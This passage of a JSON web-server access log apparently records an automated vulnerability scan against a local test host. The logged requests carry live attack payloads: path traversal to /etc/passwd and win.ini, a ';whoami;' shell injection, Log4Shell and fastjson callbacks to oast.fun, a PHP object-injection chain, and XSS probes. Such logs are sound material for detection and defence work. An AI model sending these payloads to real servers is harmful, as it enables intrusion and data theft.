"13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Dockerrun.aws.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dfshealth.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.test.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.dev.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"1.195","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.prod.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"asusrouter--", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/Access/default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download?type=files&filename=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/auth/roles HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"[{\x22query\x22:\x22query {\x5Cn __typename \x5Cn }\x22}, {\x22query\x22:\x22mutation { \x5Cn __typename \x5Cn }\x22}]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.178","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"username=${jndi:ldap://${hostName}.c9v8h8gsmpv8c1qg07h05p69d87jr5nzy.oast.fun/test}&password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"297MTlw79fqETSHi5zNtnop0WN2","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /testing-put.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /testing-put.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.172","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.175","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cobbler_web HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.177","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adfs/ls/idpinitiatedsignon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/super-forms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.162","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"{\x0D\x0A \x22token\x22: {\x0D\x0A \x22$func\x22: \x22var_dump\x22\x0D\x0A }\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/newpassword HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.160","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22br.com.anteros.dbcp.AnterosDBCPConfig\x22,\x0D\x0A \x22metricRegistry\x22:\x22rmi:/c9v8h8gsmpv8c1qg07h0m44aa9z74fcep.oast.fun/Exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.159","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/297MTrIbx0NrPaMCiDj6kCm4N9O.php&data=HACKERMAN","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/backend1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/qards/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/297MTrIbx0NrPaMCiDj6kCm4N9O.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mt/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mt.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/3 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/4 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gemfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/6 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/7 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/8 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.164","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"amty_hidden=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1 